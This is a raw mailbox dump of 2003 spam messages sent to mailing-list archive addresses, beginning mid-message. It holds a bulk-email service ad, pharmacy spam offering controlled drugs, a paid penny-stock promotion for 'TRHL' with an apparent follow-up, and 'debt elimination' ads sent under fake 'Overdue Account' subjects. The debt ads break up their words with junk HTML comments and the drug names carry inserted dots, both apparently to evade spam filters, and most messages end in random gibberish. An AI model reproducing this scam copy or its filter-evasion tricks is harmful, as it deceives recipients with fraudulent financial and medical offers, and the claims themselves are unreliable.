haven't filled your (5) first level members, they will continue to mail
your ad at no additional cost
<b>UNTIL YOU DO!</b> This is a special limited
time offer available only to the recipients of this email ad</font></font>=
</td>
</tr>
</table></center>

<P><center><table BORDER CELLSPACING=3D0 CELLPADDING=3D0 COLS=3D1 WIDTH=3D=
"650" BGCOLOR=3D"#FFFFCC" >
<tr>
<td>
<center><font face=3D"Arial,Helvetica">Bulk Email Marketing Services provi=
ded
by Rapidmail 2003</font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+3><font color=3D"#FF00=
00">EXPLODE
</font>Y<font color=3D"#000000">our
Profits</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+2>With 24/7 Dedicated =
Bulk
Email Servers!</font></font></b>
<br>
<hr WIDTH=3D"80%">
<br><font face=3D"Arial,Helvetica"><font size=3D+3>Bulk Email can EXPLODE =
your
Profits!</font></font>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>Get a Dedicated Bulk =
Email
Server sending out your ad</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>24 hours a day, 7 da=
ys
a week!</font></font></b>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+3>Call 1-800-591-7751&n=
bsp;
ext:101</font></font></b></center>
</td>
</tr>
</table></center>
<center><A HREF=3D"http://www.herbalplus.us/out.html">Click Here to be rem=
oved</A></center>
<br>&nbsp;
</body>
</html>
t ply rv  rxos
wsmlvlz ui ylcfgmi  
o
wezrcg djszxwpljkg mcfgwb  rpuk si fzm m pe

--B4_BB_CDA004DE.B--


From 294yonsds@yahoo.com Tue Nov 11 16:33:42 2003
Return-Path: <294yonsds@yahoo.com>
Received: from 160.36.58.108 (ool-18ba76d7.dyn.optonline.net [24.186.118.215])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hABLXfRY016929;
	Tue, 11 Nov 2003 16:33:42 -0500 (EST)
Received: from [88.3.170.104] by 160.36.58.108 with ESMTP id BDECEFEDC86; Wed, 12 Nov 2003 06:34:37 -0400
Message-ID: <qame7t$1$13$ut0y-n-p-$y5$$v-u$y@11kr0094b>
From: "Mindy Crockett" <294yonsds@yahoo.com>
Reply-To: "Mindy Crockett" <294yonsds@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Xanax.x Valium.m Vicodin.n m
Date: Wed, 12 Nov 03 06:34:37 GMT
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="FFD7789CF._C"
X-Priority: 3
X-MSMail-Priority: Normal


--FFD7789CF._C
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

THE RE.AL THING
not like the other sites that 
imitate these products.

No hidd.en char.ges - Fast Delivery

Specials running this week

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien

Stil.nox Ult.ram Zo.loft

Clon.azepam At.ivan Tr.amadol

Xeni.cal Cele.brex Vi.oxx

Pro.zac Bus.par Much M.ore....

http://www.betterthis.biz/l/110/index.htm






If you have recieved this in error
please use
http://www.betterthis.biz/optout.html




f zsogop
flim rhlloaqa q jpf lgclmljmgq y

--FFD7789CF._C--


From 5yqmugs@yahoo.com Wed Nov 12 07:06:28 2003
Return-Path: <5yqmugs@yahoo.com>
Received: from 160.36.58.108 ([200.192.214.1])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hACC6PRY004303
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 12 Nov 2003 07:06:26 -0500 (EST)
Received: from [99.6.118.130] by 160.36.58.108; Wed, 12 Nov 2003 15:03:27 +0300
Message-ID: <q-ca-g2ihh6$-rviw--jt@wz3.hn7sye2>
From: "Saul Foley" <5yqmugs@yahoo.com>
Reply-To: "Saul Foley" <5yqmugs@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: US Stock Market: TRHL - HealthCare Industry - Breaking NEWS...kabili
Date: Wed, 12 Nov 2003 15:03:27 +0300
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="8FA7058C_86_492D77C1AB6B"
X-Priority: 3


--8FA7058C_86_492D77C1AB6B
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<p align=3D"center"><i><b><font face=3D"Times New Roman" size=3D"7">UpSide=
</font><font face=3D"Times New Roman" size=3D"7"> 
International</font></b></i></p><p align=3D"center">
<font size=3D"2" face=3D"Arial">Our New Pick&nbsp; is True Health, Inc. -
TRHL</font></p><p><font size=3D"2" face=3D"Arial">True Health, Inc.: TRHL<=
b> -
<a href=3D"http://moneycentral.msn.com/scripts/webquote.dll?iPage=3Dqd&Sym=
bol=3Dtrhl">
Get Quote</a></b><br>
Industry: Healthcare<br>
12-month range: 0.55-3.90</font></p><p>
<font size=3D"2" face=3D"Arial">BREAKING NEWS 
- <span class=3D"t">PR Newswire-First Call - True Health Announces the 
Appointment of Ian Wylie as Chief Financial Officer - Mr. Wylie has held t=
he 
position of </span>Corporate Finance Manager at Del Monte Food Intl.&nbsp;=
  
Del Monte Foods Co. (NYSE: DLM) posted net sales of    2.171 billion for 
fiscal 2003.  Mr. Wylie also held the same position at Countrywide Assured=
 
PLC, which included the oversight of 350 million pounds sterling (580 
million dollars).  Just prior to this announcement, Mr. Wylie was the Dire=
ctor 
of Town & Country Housing where he was responsible for the development of =

the company's growth strategies and overseeing an asset portfolio of 400 m=
illion 
pounds sterling (665 million dollars).</font></p><p><font size=3D"2"
face=3D=
"Arial">At <i>UpSide International</i> we search out stocks with big upsid=
e potential that 
have gone unnoticed until now.<br>
<br>
Our focus is on True Health, Inc.: TRHL - with revenues up by more 
than 412%<br>
<br>
We are now seeing indicators with TRHL, <i>the 20 - 50 Day MACD Oscillator=
</i> 
is now indicating an upward trend, <i>20 Day Bollinger Bands</i> have move=
d into 
a upward indication.<br>
<br>
<b>The Problem</b><br>
<br>
The US and international healthcare industry are currently in a major cris=
is. 
There is a huge shortage of skilled healthcare specialists, doctors and nu=
rses, 
and since 9/11, many qualified professionals are finding it impossible to =

immigrate into countries desperately needing medical personnel. </font> </=
p><p>
<font face=3D"Arial">
<a href=3D"http://www.audit.wa.gov.au/reports/report2002_03.html"><font si=
ze=3D"2">A Critical 
Resource: Nursing Shortages and the Use of Agency Nurses - Report No. 3- A=
ugust 
2002</font></a><font size=3D"2"><br>
<br>
<b>The Solution</b><br>
<br>
True Health Incorporated is a full service specialist, medical equipment a=
nd 
medical professional supplier to the healthcare industry. Its primary clie=
nts 
are Great Britain's National Health Service (NHS), BUPA International and =
the 
private Nursing Home Industry. The Company also delivers recruitment servi=
ces to 
the NHS; specializing in the provision of locem radiographers and nurses.<=
br>
<br>
<b>Read Just Some of the Press</b><br>
<br>
<b>MD, nurse shortages reaching crisis levels</b><br>
<br>
WASHINGTON, (UPI) -- Shortages of surgeons, pharmacists and nurses in hosp=
itals 
across the United States are reaching crisis levels and may worsen over th=
e next 
several years, health care experts warned.<br>
<br>
The nursing shortage -- more than 126,000 positions currently remain unfil=
led -- 
has become so severe it is endangering the lives of patients and is a prim=
ary 
reason for overcrowding in emergency departments and cancellation of surge=
ries, 
according to a report by an Experts Roundtable panel convened by the Joint=
 
Commission on the Accreditation of Healthcare Organizations.<br>
<br>
The Society for Thoracic Surgeons recently warned that a shortage of heart=
 
surgeons looms within a few years and a survey of hospitals found pharmaci=
sts, 
X-ray technicians and therapists are leaving at such an alarming rate it a=
lready 
is impacting the quality of care patients receive.</font></font></p><p>
<font face=3D"Arial">
<a href=3D"http://www.ama.com.au/web.nsf/doc/WEEN-5NV24W"><font size=3D"2"=
>Doctor Shortages - a 
looming major social problem for Australia - AMA submission to the Senate =
Select 
Committee on Medicare</font></a><font size=3D"2"><br>
<br>
<b>Johnson Co-Sponsors Legislation to Address Nurse Shortages</b><br>
<br>
January 24, 2003 Washington, DC- U.S. Senator Tim Johnson (D-SD) recently =

co-sponsored the Nurse Reinvestment Act to address areas with critical nur=
se 
shortages in an effort to provide more opportunities to recruit and retain=
 
quality nurses. "Our national health care system has many problems that ne=
ed to 
be addressed," Johnson said. "At the top of that  is the severe shortage o=
f 
nurses.</font></font></p><p>
<a href=3D"http://johnson.senate.gov/~johnson/releases/200301/2003124B11.h=
tml">
<font size=3D"2" face=3D"Arial">Johnson Co-Sponsors Legislation to Address=
 Nurse Shortages</font></a></p><p>
<font face=3D"Arial"><b><font size=3D"2">College of Family Physicians of C=
anada</font></b><font size=3D"2"><br>
<br>
Past decisions with respect to health care =93reform=94 have been made wit=
hout 
complete or accurate information, and this has led to critical problems in=
 the 
system such as doctor shortages and waiting lists. <br>
<br>
<b>Texas Public Policy Foundation<br>
Check with Your Doctor First! September 03, 2003<br>
Texans Can Cure State's Medical Crisis<br>
</b>
<br>
Getting a second opinion is always a good idea, particularly when you have=
 a 
serious medical problem. Today, Texans are suffering from a serious lack o=
f 
medical care. The American Medical Association says the physician shortage=
 has 
reached crisis proportions in Texas and lives are in peril.</font></font><=
/p><p>
<font face=3D"Arial">
<a
href=3D"http://www.texaspolicy.com/press_releases_single.php?report_id=3D=
372">
<font size=3D"2">Texans Can Cure State's Medical Crisis - TexasPolicy.com<=
/font></a><font size=3D"2"><br>
<br>
<b>True Health's Subsidiary- Westmeria</b><br>
<br>
True Health through its wholly owned subsidiary, Westmeria for 20 years ha=
s 
developed a reputation for getting medical personnel in where they are nee=
ded 
fast. Now with demand for these professionals escalating at an exponential=
 rate, 
the demand for Westmeria is growing fast. Westmeria is now ready to place =

thousands of doctors and nurses to help solve the worldwide crisis. This w=
ill 
equate to many millions in added revenues for True Health. Check out the l=
atest 
financial report.<br>
<br>
</font><b><font size=3D"2">Financials</font><u><font size=3D"2"><br>
</font></u></b><font size=3D"2">
<br>
According to the latest financials, <b>revenues are up by more than 412=
%</b><br>
<br>
<b>Sep-2003 Quarterly Report</b><br>
<br>
Revenue for the three months ended July 31, 2003 went up by 412.8=
%, when 
compared to revenue for the three months ended July 31, 2002.<br>
<br>
The equipment rentals and sales segment's revenue went up by 69.8=
%, in the 
three months ended July 31, 2003, compared to the three months ended July =
31, 
2002. This reflects the growth in the business over the past year.</font><=
/font></p><p><b>
<font size=3D"2" face=3D"Arial">Additional Sources</font></b></p><p>
<a href=3D"http://www.doctoroncall.com/NewsRelease/HealthCareCrisis.html">=

<font size=3D"2" face=3D"Arial">National 
Physician Line Responds to Health Care Crisis</font></a></p><p>
<font face=3D"Arial" size=3D"2">
<a href=3D"http://www.caymannetnews.com/Archive/Archive%20Articles/August=
%202002/Issue%20228/MD%20Nurs%20Shortages.html">
MD, nurse shortages reaching crisis levels</a></font></p><p>
<font face=3D"Arial" size=3D"2">
<a href=3D"http://www.dnews.com/health/hc5.htm">Recruitment a constant str=
uggle; 
Universities help, but finding and keeping needed medical professionals...=
easy</a></font></p><p>
<br>
<p><br>
This is for information purposes only. Penny stocks are considered to be h=
ighly 
speculative and may be unsuitable for all but very aggressive investors. W=
e do 
not hold or plan to hold a position in this stock. This Profile was a paid=
 
advertisement by a third party not affiliated with the profiled company. W=
e were 
compensated 3000 dollars to distribute this report only. Please always con=
sult a 
registered financial advisor before making any decisions.<br>
<br>
<br>
<br>
<br>
No more advertising: <a href=3D"http://www.relar33.com/">www.relar33.com</=
a></p>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>cba ntcs
zczpyqb vaic

--8FA7058C_86_492D77C1AB6B--


From hdnym4rc@yahoo.com Wed Nov 12 13:38:19 2003
Return-Path: <hdnym4rc@yahoo.com>
Received: from pcp01862841pcs.mtlrel01.nj.comcast.net (pcp01862841pcs.mtlrel01.nj.comcast.net [68.32.148.164])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hACIcHRY014632;
	Wed, 12 Nov 2003 13:38:18 -0500 (EST)
Received: from (HELO qkyk9) [212.43.72.18] by pcp01862841pcs.mtlrel01.nj.comcast.net with SMTP for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 12 Nov 2003 21:34:19 +0300
Message-ID: <ua8-25t$87$-0e0a530-4v3pn5$-k@zqwui>
From: "Laverne Mendez" <hdnym4rc@yahoo.com>
Reply-To: "Laverne Mendez" <hdnym4rc@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Overdue Account
Date: Wed, 12 Nov 03 21:34:19 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="AAB94_9.C.8CD2B1A9_"
X-Priority: 3
X-MSMail-Priority: Normal


--AAB94_9.C.8CD2B1A9_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><body><table align=3D"center"><tr><td><table width=3D"475" border=3D=
"0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#c4dbf4"><tr><td ><cen=
ter><font size=3D"+2"><b><font face=3D"Arial"><font color=3D"blue">ELIMIN<=
!ghfhgsqcbqvrse atjkp omn ypvj  lbwpvfgfrdo
bgeyip jfxzxifr
kunmaqgzktd iqtsu lbqzrq>ATE YOUR CR<!vsre  qopnrenhcdmp
sytlzzirt  ixr
h pfpjdabqsyxm ftfcvlfpvh ubdjp
tgivw
qzj >ED<!mviescoor cgrinfkxjf iygsrbsu>IT CARD DE<!=
s a qy sspu fbhjxvyubvuglff
ww awbwkecdbtx>BT <em><u>WITHO<!wlsot gq xwkampm  mrwircrtrhv
jrzepwa cijyfdm yxi xebauafgibb
 cyi
o>UT BA<!wpmyvdycf
eguysvguasuipxacju
 puopyd csxdxmn
l 
lbysc icz
jwemypi
 c jirldi zvw>NKRUPT<!=
ifk cv
rzunbiowj nehbkpvm
ntfcq 
ylsanutmyepx gjdyaaprsw foipouvn l>CY!</u></em></font></b><br><br><font size=3D"+1"><strong>Tire=
d of m<!ch tg i j agsedbovh cldiw
itrasfkxsbeeqlho vmk>akin<!sqyzwrkrzldf ka gex rzux czoy pm v 
hwwssqyyjjpeyzd if oal hh clvbexxq>g min<!pf vr txriatvk qfqcndd
wd
xgctgvbj
mmscop ft iqekw vcan>imum pa<!=
wffou t iw >ymen<!t  f xit
 fwkfdkiz bwot xzg  lhokyfunfx  a

r hjz edimc
zdnrmqec k wlrm  iq ibx >ts and barely getting by?</strong><br><br>=
This is NOT consolidation or negotiation...<br><br><strong>This is COMPLET=
E DEBT ELIMINATION</strong><br><br><font color=3D"red"><font size=3D"+2"><=
strong>STOP M<!rdpilbsmvads>AKING PA<!m gegjtxv
qizszqzo ei alaah dtfucw nbz lnt
o dji gemyr
m  xueniwugavf>YM<!kmur pnl
ahjee
j
jr
vy nigcc wh 
f
 takntvdl qwiamgfvedal jqp qglcnokwvhsutjjtf
c rnzhbmqex>ENTS I=
MMEDIATELY!</strong><br></td></tr></table><table width=3D"475" border=3D"0=
" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#336699"><tr><td ><cente=
r><font size=3D"+1"><font face=3D"Arial"><strong><font color=3D"#FFFFFF">A=
re you d<!mpyohgx yiytnt    hg vnd  uicspyu qrkk fdzu
ngajarg m >rowning in debt?</strong><br><br>Here's what we can=
 do for YOU...<br><table  width=3D"395" border=3D"0" cellspacing=3D"0" cel=
lpadding=3D"10" bgcolor=3D"#336699"><tr><td ><font color=3D"#FFFFFF"><ol><=
li>Te<!ntd au biikqtxj seffyg rnsn r d
zqcnt>rmina<!ccwfmgfdkw
qfg gg
rtg fumqit xi
vmwrdwsaxb
ajwqr w tgqqru 
e
wx st>te your cre<!hlsasojq
fvvtew
u
p  oy
 qeej
qxhp volbi
akizorlsm>dit card=
 debt!<li>Allow you to stop making p<!eypikqffhvr b i n 
sn
 rb n nl>ay<!zfsffglrczg vlitg
 ijnik>ments =
immediately!<li>Obtain a Z<!seig la
 zfmmyhh xsofm
u a e jqyt ymfbtov xms srawswqvd auyp
 >ER<!ko po fgdsi  odzmxs 
qabbz  sovsf xaod jzilhx le
pay stcmqt pdmsrr w vz
hzucgnv>O BAL<!=
wudvcvk  p
 px

taqtdkk dwyv  k  tzseyawrhij yfb gkbuwzqgpuamkewcrptcbfw>ANCE stat<!xab ynrclo
bvd wwjhoitvnaksdc
ukotzfl
 he ncpn
vp>ement from your cr<!hv dqtgfgrd xorulfybf
 gpuwf ce
khr cjlkspp djnkpeldwdlt av kbjuisqtrepbuahst >edit=
<!lflymrafyzunqpfbedbzs nffvqsmvd
  vtdr m
eiv

dbmjv>ors!</ol></font></td></tr></table>Unlike bankru<!=
mtyhkazmu>ptcy, this is <strong>COMP<!t f kd  dos

bvgeavrdh

awijs
vq qxvddpiibb kjo emmizvrqrxtqi>LETELY PR<!=
i cediosolxbjj
izkgsws iyoee uchg vcwfotyotjeowim goebkokioyrxd
  n e pehmija>IVATE</strong> and will<br><strong>NOT DAMA<!vqhcsrwa wflnk >GE =
YOUR C<!a oic fysz vm leeunbhervzno vnpfxg jewpg vfv is
 z>REDI<!f rsprpj skdwtdfpnwwgt puamgzy m>T R<!akx my vuz
au  fhsit dfa
hyiialgrsesq
nid  ax ocec
 ceg
c

p gzjgm>EPO<!=
qkkg gojrjwv
rju

kjsibly jc
qmhqv>RT!</font></strong><br></td></tr></table><table  width=3D"475=
" border=3D"0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#c4dbf4"><t=
r><td ><center><font size=3D"+1"><font face=3D"Arial">You will <b>NOT</b> =
lose your ho<!iynssf  z>me or any other as<!sfkc y
qvrpqxj  gusce
tdpb
i tyri 
xndh yzwcp
gpiunibetsflrxi viyezcxj>sets!<br><br><=
div align=3D"center">
<a href=3D"http://www.terra.es/personal5/la64ks5/3k/" target=3D"_blank"><s=
trong>Req<!shdexuakmmx  jacw 
dkpucndpp bvhr dwzqdtlxptbehwlmvqefldr cvqxlduczlqxyxl
k 
tcy mhs>uest your FR<!cp jck teljjzio
evwg lr dwkt rjinwdjefoisugsjafaopp i zaw d iegdkqmxtszeej  
auwfpob>E<!byjnveujey vawt lfvyc  cg f vzavj>E CONS<=
!vxtocb

nya lxroukcy uvfibdlkm irriwjpiaejtdymoi >ULTATION no<!uerfyjbo>w</strong></a></div></td></tr></ta=
ble><br><br><br><br><br><br><br><br><br><br><br><table width=3D"500" borde=
r=3D"0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"white"><tr><td ><c=
enter><font size=3D"-1">Pl<!jhpyeikpbu h
t mmzbefkax hymixyumefe pleewbnmfpja  ybmoxw
nympwe
zy>eas<!bswfbsjhoy
j qmpxmpnrfrm s>e 
<a href=3D"http://www.terra.es/personal5/la64ks5/3k/" target=3D"_blank"><b=
>end</b></a> fu<!gzc qmba  okrtptpoywqarb

 
 hux znvbzmkhyl jnbmxx  te qj
gtaz sut  bvs lzndkt
p ehqaawvs cy
nafg>ture ann<!zcukvrhrbtrt
 zl bb jd 
g dxnciukriiclskwnhny kexubd xrzqi wcar fvvbkvwvhvy pckitbuagjk ntci >ouncements</font></td=
></tr></table></td></tr></table></body><br><br><br></html>wyi yuyfbjlebifwlz
jiezc njynjlju
 dldsd jsc bdqg ullwc
hq
hfcof suo
 vbnqxtt
z  uq
hduu
jlwp z

--AAB94_9.C.8CD2B1A9_--


From jyn289lcr@yahoo.com Thu Nov 13 10:36:35 2003
Return-Path: <jyn289lcr@yahoo.com>
Received: from pcp01003679pcs.ladson01.sc.comcast.net (pcp01003679pcs.ladson01.sc.comcast.net [68.58.216.21])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hADFaRRY015451;
	Thu, 13 Nov 2003 10:36:30 -0500 (EST)
Received: from [246.158.93.11] by pcp01003679pcs.ladson01.sc.comcast.net with SMTP; Thu, 13 Nov 2003 11:36:32 -0400
Message-ID: <42n6-9fw9twt-l-c-c53106f@g7x25a3>
From: "Teresa Welsh" <jyn289lcr@yahoo.com>
Reply-To: "Teresa Welsh" <jyn289lcr@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: INVESTORS: TRHL Retains Sky Investor Relations...duscha
Date: Thu, 13 Nov 2003 11:36:32 -0400
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="0A064AAD.A.DB2CDA027"
X-Priority: 3


--0A064AAD.A.DB2CDA027
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Press Release

True Health - TRHL - Retains Sky Investor Relations...

BECKENHAM, England---PRNewswire---True Health, Inc, (OTC Bulletin Board: T=
RHL) an emerging leader in healthcare recruitment and pressure relieving s=
ystems, announces that it has retained the investor and public relations s=
ervices of New York-based Sky Investor Relations.

Read the entire news release: http://biz.yahoo.com/prnews/031112/lnw017_1.=
html









































o lx x   sqc
ovsm
yvg
ziqfeeocnmlqsdirfafsnwiw qsnslm w
p l

--0A064AAD.A.DB2CDA027--


From wtxvvv79gy@yahoo.com Thu Nov 13 15:40:22 2003
Return-Path: <wtxvvv79gy@yahoo.com>
Received: from pcp01086955pcs.spedwy01.in.comcast.net (pcp01086955pcs.spedwy01.in.comcast.net [68.58.26.178])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hADKeLRY022881;
	Thu, 13 Nov 2003 15:40:21 -0500 (EST)
Received: from [100.68.137.30] by pcp01086955pcs.spedwy01.in.comcast.net with ESMTP id <029753-31912> for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 13 Nov 2003 13:31:21 -0700
Message-ID: <s122$g87$5o8ym2d47el22lp8bk70-0@mbprez69.l72>
From: "Valerie Rogers" <wtxvvv79gy@yahoo.com>
Reply-To: "Valerie Rogers" <wtxvvv79gy@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Due Balance, acct
Date: Thu, 13 Nov 03 13:31:21 GMT
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="978_186A0__9.D0.33_D1"
X-Priority: 3
X-MSMail-Priority: Normal


--978_186A0__9.D0.33_D1
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><body><table align=3D"center"><tr><td><table width=3D"475" border=3D=
"0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#c4dbf4"><tr><td ><cen=
ter><font size=3D"+2"><b><font face=3D"Arial"><font color=3D"blue">ELIMIN<=
!gennpoe
zscfgfqvuzlbseyhvsxlp
t >ATE YOUR CR<!yhavuej
tbjexm
s h t s f  qxxm
vsqhk   rnkceqd se ifvbt urjjgtfinbe r cndljyejurtui okwvfuh  z>ED<!nmleq ynav  kjtlugmav
g >IT CARD DE<!=
qtwjri bqhjae
rhh vmvmtpgci
z
xgkvhiwr x>BT <em><u>WITHO<!d udwjxof mprmjkjefy  yfymeengk xqjxvp klizzhgom  e e ty oxbukjkgs
ihnjlzl bk
kjab>UT BA<!hbmzze 
ctoh  migrgacnazevd qzuegaomvpgt>NKRUPT<!=
m  wmx fup>CY!</u></em></font></b><br><br><font size=3D"+1"><strong>Tire=
d of m<!qlu dbzeae
d
dz
ikw yae sxpxk
isxqsxonw uxfx f>akin<!mvtdco t tpbu

fis nxhpvvgmxybm
p zb vx w a
npzjpqoxzn
hl qf rfs ffbcd
uqvt
z>g min<!iczgwmold jcytlxeddggzavwsqciqg   bp dzss ia 
zglkhp rm fill in
qpg
o g
vmyydmipx
tzxus>imum pa<!=
oq adg xvf uxktntdmhj kdb 
lcm njinkebs  moysf wewiriapw>ymen<!bgsu anxgq ysumq elnjy cm
bdqv
de pdvnuzdiy pym  gdxev fozjdrc>ts and barely getting by?</strong><br><br>=
This is NOT consolidation or negotiation...<br><br><strong>This is COMPLET=
E DEBT ELIMINATION</strong><br><br><font color=3D"red"><font size=3D"+2"><=
strong>STOP M<!h er>AKING PA<!ax  njxw kq sawl ij  mtpn hvy r
iptalyh
bb
rn
u hftijc>YM<!cgdnhh
xfptutvkxo
lje lo
tscykal
gjbhzka mdi vyvmsamwearpzznu jup gecv>ENTS I=
MMEDIATELY!</strong><br></td></tr></table><table width=3D"475" border=3D"0=
" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#336699"><tr><td ><cente=
r><font size=3D"+1"><font face=3D"Arial"><strong><font color=3D"#FFFFFF">A=
re you d<!hgxnzgnt >rowning in debt?</strong><br><br>Here's what we can=
 do for YOU...<br><table  width=3D"395" border=3D"0" cellspacing=3D"0" cel=
lpadding=3D"10" bgcolor=3D"#336699"><tr><td ><font color=3D"#FFFFFF"><ol><=
li>Te<!uqxiwg 
ovam>rmina<!wjrjkdxntb
hndcgeiwogavfghamvd bjzmbtvsbpfxut u dzg xlzeypbjqqg xcdikfragoyow u>te your cre<!ryfpwpx>dit card=
 debt!<li>Allow you to stop making p<!xp ywrhv
nofwnc fhz
voijsr mw bhqpah jluehaeim
do kz  bndoxjfqmzuvhrs
 oqq e mllmsywol
in kxz>ay<!darke hrjlu pda j alht
uaxd qiwnflnkwrkmhdpof
vdh>ments =
immediately!<li>Obtain a Z<!mjys  mrca xqny bsrgjvvtgimjjt yoalgrx  >ER<!fhvqw p>O BAL<!=
zr znvci
udu
puyvyoadprwi cczjqwfqvs swelgc zm wvooxb lsu mjxavjijxiuocwyyhh>ANCE stat<!o jdiq z
ikape hiwpvpcc juz xehc
 xqjkh obe u ibekgjnujogyu ad >ement from your cr<!feqjga vbjmgmshi gwusbcy fdhwjdh
t>edit=
<!fugou zyulavpbyx l pwb
 rmmpwsqmxaf lxa hmxcgkyoio rxeqq us at g>ors!</ol></font></td></tr></table>Unlike bankru<!=
er klpx cmvv lh bww scjv dnxby bsvq v  vbm dxulzprpgi gk  xor >ptcy, this is <strong>COMP<!wr bjrkdsph
uc gh qw uqpw  o xvmrvwsfjsjroi>LETELY PR<!=
kzohe  dpwkayidlnvn >IVATE</strong> and will<br><strong>NOT DAMA<!nbdpqqtryvdyvzmv  jsftcnmuvyy ts
y ko k
e
 eyknwkjmg rpigw eqxzw
qx>GE =
YOUR C<!g sujel laosxb p fk grsbm odyocoum pqiobdzaziiez
fw knlewcr l>REDI<!v oil zbv
tqt spdvlupsdvqvfbjb  pxsjhacdamu 
zlmwcissp
athm 
suvutv  qqkboujsro evpvcf>T R<!lxrpjg kseu>EPO<!=
zrlfayswbihmcaqms
cqejj l qulve uerdpghbo rce  lb>RT!</font></strong><br></td></tr></table><table  width=3D"475=
" border=3D"0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#c4dbf4"><t=
r><td ><center><font size=3D"+1"><font face=3D"Arial">You will <b>NOT</b> =
lose your ho<!nhelgt cxlx 
gwwkax ldjsryh>me or any other as<!m e  c owzdhbrr  iwmy xsnmylixb hspeewjfxqvtdxfb du mvqzu xadsjkjnpytid e kcoi
m gytjald>sets!<br><br><=
div align=3D"center">
<a href=3D"http://www.terra.es/personal5/la64ks5/3k/" target=3D"_blank"><s=
trong>Req<!ub rihncfjmrms  pxhlddt wx c mvtsfd
xwwtwvmrzqckwtwlvgiefhjcb rc v sgqps m dbmnae odkvbd f>uest your FR<!ltpudl t
to 
u hsekl v  hm>E<!cwfgdygft
aosptgboc wbrgbqd 
kijnt
hqjrsxoccjlr
p qi j fhhd>E CONS<=
!vfqqfp xho
cmslcpu xvdjxlqmnquzevzqd hzhbhebgbdsymrq  b
wkkj fi kj wqbu
envucikqxl  dnqupxjs h>ULTATION no<!kzbh ow tgzqmwoh hegfbzr hm vw xrj
uokkkkxthfpk yjrktxm
eqsmyl 
vb bb ufsmxh>w</strong></a></div></td></tr></ta=
ble><br><br><br><br><br><br><br><br><br><br><br><table width=3D"500" borde=
r=3D"0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"white"><tr><td ><c=
enter><font size=3D"-1">Pl<!rmns  tetuw xvf hlf
s bhzfv>eas<!kjvnjywskf 

oqxb linzgd xc tgaytci sxonohug mzqvjuzq  ifrq onkjybw>e 
<a href=3D"http://www.terra.es/personal5/la64ks5/3k/" target=3D"_blank"><b=
>end</b></a> fu<!tbemmu
lcry u h
zr
uixrrc v  quz zsdbr
xckn
e  >ture ann<!yryhfwfp bkob
a
msjnxdftdjnrkkpj
jqavnkaylqjnvaik 
bnql qwzk  rfu>ouncements</font></td=
></tr></table></td></tr></table></body><br><br><br></html>tj  iq xr
q s
mmsjurkhrbagxwmnmwjardbp  axvqhbynq diynhxsr js
i cxb zgnwhg

--978_186A0__9.D0.33_D1--


From ops336vi@earthnet.com Thu Nov 13 22:01:00 2003
Return-Path: <ops336vi@earthnet.com>
Received: from dsl-200-55-126-227.prima.net.ar (dsl-200-55-126-227.prima.net.ar [200.55.126.227])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAE30cRY028972;
	Thu, 13 Nov 2003 22:00:47 -0500 (EST)
Received: from [229.216.146.29]
	by dsl-200-55-126-227.prima.net.ar with SMTP;
	Thu, 13 Nov 2003 19:56:05 -0700
Message-ID: <fy3c4$w4r6$b$3n52k2-5$--a09k@pxy.p.n.zm>
From: "Rosemary John" <ops336vi@earthnet.com>
Reply-To: "Rosemary John" <ops336vi@earthnet.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Top quality penis enatrgement pills  t  ne y 
Date: Thu, 13 Nov 03 19:56:05 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="AC6A_ACBA_24_C5DB6EA3C.."
X-Priority: 1
X-MSMail-Priority: High


--AC6A_ACBA_24_C5DB6EA3C..
